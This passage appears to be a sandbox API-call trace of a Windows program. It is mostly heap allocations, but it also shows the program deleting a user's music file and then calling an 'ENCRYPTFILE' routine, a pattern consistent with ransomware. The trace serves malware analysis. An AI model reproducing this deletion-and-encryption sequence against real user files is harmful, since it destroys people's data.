hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0113.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0113.110] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0113.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0113.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0113.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0113.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0113.111] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0113.111] FreeLibrary (hLibModule=0x756e0000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0113.111] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0113.111] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.111] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0113.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0113.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0113.112] CloseHandle (hObject=0x298) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0113.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0113.113] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0113.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.113] CloseHandle (hObject=0x258) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0113.116] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0113.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0113.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0113.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0113.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0113.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0113.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0113.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0113.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0113.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0113.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0113.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0113.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0113.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0113.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0113.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0113.124] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a", lpFilePart=0x0) returned 0x33 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0113.124] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\p0gi1wm_f5y2n.m4a")) returned 0x20 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0113.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0113.124] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7737e170, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0x808b4980, ftLastAccessTime.dwHighDateTime=0x1d5efc7, ftLastWriteTime.dwLowDateTime=0x808b4980, ftLastWriteTime.dwHighDateTime=0x1d5efc7, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="P0gI1wm_F5y2n.m4a", cAlternateFileName="P0GI1W~1.M4A")) returned 0x41ac280 [0113.125] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\P0gI1wm_F5y2n.m4a" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\p0gi1wm_f5y2n.m4a")) returned 1 [0113.196] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7737e170, ftCreationTime.dwHighDateTime=0x1d5e128, ftLastAccessTime.dwLowDateTime=0x808b4980, ftLastAccessTime.dwHighDateTime=0x1d5efc7, ftLastWriteTime.dwLowDateTime=0x808b4980, ftLastWriteTime.dwHighDateTime=0x1d5efc7, nFileSizeHigh=0x0, nFileSizeLow=0x12464, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="P0gI1wm_F5y2n.m4a", cAlternateFileName="P0GI1W~1.M4A")) returned 0 [0113.197] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0113.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0113.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.197] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0113.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0113.198] 